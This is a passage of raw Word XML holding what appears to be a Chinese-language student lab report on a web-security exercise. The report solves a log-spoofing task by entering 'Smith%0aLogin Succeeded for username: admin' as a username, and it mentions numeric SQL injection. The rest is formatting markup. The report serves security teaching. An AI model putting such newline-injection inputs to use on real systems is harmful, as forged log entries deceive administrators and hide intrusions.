        <w:t xml:space="preserve"> 所以要使</w:t>
      </w:r>
      <w:r w:rsidR="006D4533">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>下方的灰色空格中印出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2C1578" w14:textId="0C7285B0" w:rsidR="002B4C3F" w:rsidRDefault="006D4533" w:rsidP="00FC225A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Login succeeded for username: admin</w:t>
      </w:r>
      <w:r w:rsidR="00433F43">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00051FE7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>由於</w:t>
      </w:r>
      <w:r w:rsidR="0052443E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>我</w:t>
      </w:r>
      <w:r w:rsidR="004A6316">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>真的不知道要怎麼刪除</w:t>
      </w:r>
      <w:r w:rsidR="004A6316">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Login failed for username</w:t>
      </w:r>
      <w:r w:rsidR="00632F66">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00323D2F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。於是看了一下答案</w:t>
      </w:r>
      <w:r w:rsidR="00D03454">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，原來不用刪掉</w:t>
      </w:r>
      <w:r w:rsidR="00D03454">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Login failed for username</w:t>
      </w:r>
      <w:r w:rsidR="0037383D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008F7262">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，只要像下圖即可：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207F74D3" w14:textId="3A4F3C28" w:rsidR="008F7262" w:rsidRDefault="008F7262" w:rsidP="00FC225A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CC39E14" wp14:editId="47AC586C">
            <wp:extent cx="3797300" cy="736600"/>
            <wp:effectExtent l="0" t="0" r="1270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螢幕快照 2018-03-29 下午5.54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C506" w14:textId="5BD8D0E1" w:rsidR="00070B11" w:rsidRDefault="00E54B5F" w:rsidP="00FC225A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>於是</w:t>
      </w:r>
      <w:r w:rsidR="00070B11">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>只剩下要思考如何換行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：首先嘗試</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> \n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>但失敗</w:t>
      </w:r>
      <w:r w:rsidR="00075C8E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>於是改用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48559FBE" w14:textId="77777777" w:rsidR="00804EC9" w:rsidRDefault="00075C8E" w:rsidP="00FC225A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>User Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>輸入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D241E0" w14:textId="17DE0681" w:rsidR="00075C8E" w:rsidRDefault="00075C8E" w:rsidP="00FC225A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075C8E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Smith%0aLogin Succeeded for username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D56EAC9" w14:textId="0FD9B24D" w:rsidR="00A30AC3" w:rsidRDefault="00A30AC3" w:rsidP="00FC225A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>結果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E28DFD3" w14:textId="558B893C" w:rsidR="00FA1F2E" w:rsidRDefault="00947111" w:rsidP="00883E4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D7268C8" wp14:editId="0C1A70C4">
            <wp:extent cx="5270500" cy="2510155"/>
            <wp:effectExtent l="0" t="0" r="1270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螢幕快照 2018-03-29 下午6.05.5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39E" w14:textId="0913E242" w:rsidR="00FA1F2E" w:rsidRPr="00947111" w:rsidRDefault="00FA1F2E" w:rsidP="00883E4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>由於</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>numeric SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="00CB5F57">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 助教上課說過，故</w:t>
      </w:r>
      <w:r w:rsidR="008A677D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>再加一題。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00FA1F2E" w:rsidRPr="00947111" w:rsidSect="00312C3F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8C1431"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EE48794"/>
    <w:lvl w:ilvl="0" w:tplc="3F6684EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="SimSun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D52681"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF14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8E5"/>
    <w:rsid w:val="00007A5B"/>
    <w:rsid w:val="00012EDD"/>
    <w:rsid w:val="00014994"/>
    <w:rsid w:val="00024447"/>
    <w:rsid w:val="000449ED"/>
    <w:rsid w:val="00051FE7"/>
    <w:rsid w:val="00052A25"/>
    <w:rsid w:val="00057D90"/>
    <w:rsid w:val="00067737"/>
    <w:rsid w:val="00070B11"/>
    <w:rsid w:val="00072A14"/>
    <w:rsid w:val="00075C8E"/>
    <w:rsid w:val="00076C9B"/>
    <w:rsid w:val="00081730"/>
    <w:rsid w:val="000819AC"/>
    <w:rsid w:val="00087D60"/>
    <w:rsid w:val="000965C5"/>
    <w:rsid w:val="000A55A3"/>
    <w:rsid w:val="000A5624"/>
    <w:rsid w:val="000B764A"/>
    <w:rsid w:val="000C6283"/>
    <w:rsid w:val="000D1790"/>
    <w:rsid w:val="000E16CD"/>
    <w:rsid w:val="000F32E0"/>
    <w:rsid w:val="00106CFD"/>
    <w:rsid w:val="001077DE"/>
    <w:rsid w:val="00127ED4"/>
    <w:rsid w:val="00144052"/>
    <w:rsid w:val="00147B2D"/>
    <w:rsid w:val="0016241A"/>
    <w:rsid w:val="00174825"/>
    <w:rsid w:val="001760E0"/>
    <w:rsid w:val="00182896"/>
    <w:rsid w:val="001904F0"/>
    <w:rsid w:val="001A1A6B"/>
    <w:rsid w:val="001B0C61"/>
    <w:rsid w:val="001B3DCA"/>
    <w:rsid w:val="001B647C"/>
    <w:rsid w:val="001C0249"/>
    <w:rsid w:val="001C646A"/>
    <w:rsid w:val="001D43D8"/>
    <w:rsid w:val="00221051"/>
    <w:rsid w:val="00241ACC"/>
    <w:rsid w:val="002446D8"/>
    <w:rsid w:val="00250485"/>
    <w:rsid w:val="00256EDD"/>
    <w:rsid w:val="002811D1"/>
    <w:rsid w:val="0028428D"/>
    <w:rsid w:val="002A43F8"/>
    <w:rsid w:val="002B0B31"/>
    <w:rsid w:val="002B4C3F"/>
    <w:rsid w:val="002C1F02"/>
    <w:rsid w:val="002D2521"/>
    <w:rsid w:val="002D5497"/>
    <w:rsid w:val="002D7E7D"/>
    <w:rsid w:val="002E25F6"/>
    <w:rsid w:val="00312C3F"/>
    <w:rsid w:val="0032180A"/>
    <w:rsid w:val="00323D2F"/>
    <w:rsid w:val="00325AF2"/>
    <w:rsid w:val="003309A8"/>
    <w:rsid w:val="0034063A"/>
    <w:rsid w:val="00342CFC"/>
    <w:rsid w:val="00356129"/>
    <w:rsid w:val="0037383D"/>
    <w:rsid w:val="00376930"/>
    <w:rsid w:val="003A471A"/>
    <w:rsid w:val="003B4CEA"/>
    <w:rsid w:val="003D6E99"/>
    <w:rsid w:val="003D6F1C"/>
    <w:rsid w:val="003E0A67"/>
    <w:rsid w:val="003E15D0"/>
    <w:rsid w:val="003E4EE1"/>
    <w:rsid w:val="003E64CD"/>
    <w:rsid w:val="003F36FA"/>
    <w:rsid w:val="00402812"/>
    <w:rsid w:val="00410DE8"/>
    <w:rsid w:val="004130A2"/>
    <w:rsid w:val="00433F43"/>
    <w:rsid w:val="00442182"/>
    <w:rsid w:val="004441B3"/>
    <w:rsid w:val="004669E0"/>
    <w:rsid w:val="00470A86"/>
    <w:rsid w:val="0049256F"/>
    <w:rsid w:val="004A03C0"/>
    <w:rsid w:val="004A05B2"/>
    <w:rsid w:val="004A6316"/>
    <w:rsid w:val="004B073A"/>
    <w:rsid w:val="004B18C6"/>
    <w:rsid w:val="004B2CFC"/>
    <w:rsid w:val="004D4EB1"/>
    <w:rsid w:val="004F36F2"/>
    <w:rsid w:val="004F4D60"/>
    <w:rsid w:val="00506BF5"/>
    <w:rsid w:val="0052443E"/>
    <w:rsid w:val="00544D01"/>
    <w:rsid w:val="00556273"/>
    <w:rsid w:val="00575AAF"/>
    <w:rsid w:val="00587D5E"/>
    <w:rsid w:val="005A360F"/>
    <w:rsid w:val="005F5F8A"/>
    <w:rsid w:val="006223D4"/>
    <w:rsid w:val="00631763"/>
    <w:rsid w:val="00632F66"/>
    <w:rsid w:val="00667043"/>
    <w:rsid w:val="00677BD3"/>
    <w:rsid w:val="00695AEB"/>
    <w:rsid w:val="006B40C8"/>
    <w:rsid w:val="006C66B4"/>
    <w:rsid w:val="006C6885"/>
    <w:rsid w:val="006D4533"/>
    <w:rsid w:val="006D52B7"/>
    <w:rsid w:val="006E0ED6"/>
    <w:rsid w:val="006F0590"/>
    <w:rsid w:val="006F0DAF"/>
    <w:rsid w:val="006F0F50"/>
    <w:rsid w:val="006F2084"/>
    <w:rsid w:val="00704CD8"/>
    <w:rsid w:val="00706B6F"/>
    <w:rsid w:val="0072654C"/>
    <w:rsid w:val="00730C4F"/>
    <w:rsid w:val="00732B5D"/>
    <w:rsid w:val="00732BED"/>
    <w:rsid w:val="00740FE5"/>
    <w:rsid w:val="00755597"/>
    <w:rsid w:val="0077388E"/>
    <w:rsid w:val="00781E03"/>
    <w:rsid w:val="00782875"/>
    <w:rsid w:val="00784DB2"/>
    <w:rsid w:val="007A5B35"/>
    <w:rsid w:val="007D1DE6"/>
    <w:rsid w:val="007F0A61"/>
    <w:rsid w:val="007F58D7"/>
    <w:rsid w:val="007F5925"/>
    <w:rsid w:val="00804EC9"/>
    <w:rsid w:val="00835E96"/>
    <w:rsid w:val="00840E85"/>
    <w:rsid w:val="00852728"/>
    <w:rsid w:val="00854F51"/>
    <w:rsid w:val="00883E4B"/>
    <w:rsid w:val="0088445A"/>
    <w:rsid w:val="00885297"/>
    <w:rsid w:val="008858B8"/>
    <w:rsid w:val="0088743E"/>
    <w:rsid w:val="008913F9"/>
    <w:rsid w:val="008A677D"/>
    <w:rsid w:val="008B3020"/>
    <w:rsid w:val="008C25F6"/>
    <w:rsid w:val="008C4075"/>
    <w:rsid w:val="008E7815"/>
    <w:rsid w:val="008F2F3D"/>
    <w:rsid w:val="008F7262"/>
    <w:rsid w:val="00900CE0"/>
    <w:rsid w:val="00903A1B"/>
    <w:rsid w:val="00904E35"/>
    <w:rsid w:val="009342D9"/>
    <w:rsid w:val="009461E8"/>
    <w:rsid w:val="00947111"/>
    <w:rsid w:val="00950C40"/>
    <w:rsid w:val="00964B1F"/>
    <w:rsid w:val="00983636"/>
    <w:rsid w:val="009978A9"/>
    <w:rsid w:val="009B347F"/>
    <w:rsid w:val="009B4C26"/>
    <w:rsid w:val="009F4F54"/>
    <w:rsid w:val="009F74B5"/>
    <w:rsid w:val="00A04AA3"/>
    <w:rsid w:val="00A26240"/>
    <w:rsid w:val="00A30AC3"/>
    <w:rsid w:val="00A35A0D"/>
    <w:rsid w:val="00A41DCA"/>
    <w:rsid w:val="00A53D7E"/>
    <w:rsid w:val="00A60473"/>
    <w:rsid w:val="00A74AB9"/>
    <w:rsid w:val="00A81060"/>
    <w:rsid w:val="00A8195B"/>
    <w:rsid w:val="00A81AB0"/>
    <w:rsid w:val="00A85A0E"/>
    <w:rsid w:val="00A87385"/>
    <w:rsid w:val="00A917E7"/>
    <w:rsid w:val="00A95A65"/>
    <w:rsid w:val="00A970A7"/>
    <w:rsid w:val="00AA1B3B"/>
    <w:rsid w:val="00AB4B79"/>
    <w:rsid w:val="00AB6584"/>
    <w:rsid w:val="00AC2CAB"/>
    <w:rsid w:val="00AE1B09"/>
    <w:rsid w:val="00AF69D4"/>
    <w:rsid w:val="00AF7CC7"/>
    <w:rsid w:val="00B26E38"/>
    <w:rsid w:val="00B30975"/>
    <w:rsid w:val="00B81944"/>
    <w:rsid w:val="00B87CA7"/>
    <w:rsid w:val="00BC1148"/>
    <w:rsid w:val="00BE1704"/>
    <w:rsid w:val="00BE185B"/>
    <w:rsid w:val="00BE3153"/>
    <w:rsid w:val="00C16BC8"/>
    <w:rsid w:val="00C17A3C"/>
    <w:rsid w:val="00C306AD"/>
    <w:rsid w:val="00C31601"/>
    <w:rsid w:val="00C31F64"/>
    <w:rsid w:val="00C428F6"/>
    <w:rsid w:val="00C44F3E"/>
    <w:rsid w:val="00CA1715"/>
    <w:rsid w:val="00CA4634"/>
    <w:rsid w:val="00CA7CB0"/>
    <w:rsid w:val="00CB46F4"/>
    <w:rsid w:val="00CB4FAD"/>
    <w:rsid w:val="00CB5F57"/>
    <w:rsid w:val="00CC053C"/>
    <w:rsid w:val="00CC3772"/>
    <w:rsid w:val="00CD2940"/>
    <w:rsid w:val="00CF5753"/>
    <w:rsid w:val="00D03454"/>
    <w:rsid w:val="00D13321"/>
    <w:rsid w:val="00D1650A"/>
    <w:rsid w:val="00D17695"/>
    <w:rsid w:val="00D4346B"/>
    <w:rsid w:val="00D47302"/>
    <w:rsid w:val="00D75186"/>
    <w:rsid w:val="00D7750B"/>
    <w:rsid w:val="00D87468"/>
    <w:rsid w:val="00D96224"/>
    <w:rsid w:val="00D970B1"/>
    <w:rsid w:val="00DA2C06"/>
    <w:rsid w:val="00DC7D8C"/>
    <w:rsid w:val="00DD7473"/>
    <w:rsid w:val="00DE444A"/>
    <w:rsid w:val="00E10334"/>
    <w:rsid w:val="00E211E5"/>
    <w:rsid w:val="00E30B62"/>
    <w:rsid w:val="00E513CD"/>
    <w:rsid w:val="00E536E3"/>
    <w:rsid w:val="00E54B5F"/>
    <w:rsid w:val="00E6138B"/>
    <w:rsid w:val="00E6372E"/>
    <w:rsid w:val="00E83B1F"/>
    <w:rsid w:val="00ED325E"/>
    <w:rsid w:val="00EE2251"/>
    <w:rsid w:val="00EF482D"/>
    <w:rsid w:val="00F3123D"/>
    <w:rsid w:val="00F50B65"/>
    <w:rsid w:val="00F51377"/>
    <w:rsid w:val="00F53E30"/>
    <w:rsid w:val="00F54306"/>
    <w:rsid w:val="00F73619"/>
    <w:rsid w:val="00F848E5"/>
    <w:rsid w:val="00F91063"/>
    <w:rsid w:val="00FA0143"/>
    <w:rsid w:val="00FA1F2E"/>
    <w:rsid w:val="00FC225A"/>
    <w:rsid w:val="00FC2CFD"/>
    <w:rsid w:val="00FE6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75E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25A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2C1F0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F848E5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-variable">
    <w:name w:val="cm-variable"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F848E5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-string">
    <w:name w:val="cm-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F848E5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-comment">
    <w:name w:val="cm-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F848E5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-meta">
    <w:name w:val="cm-meta"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F848E5"/>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00F848E5"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C306AD"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:leftChars="200" w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="標題 1 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002C1F02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7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482</Words>
  <Characters>2753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310</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-24T15:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-29T10:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>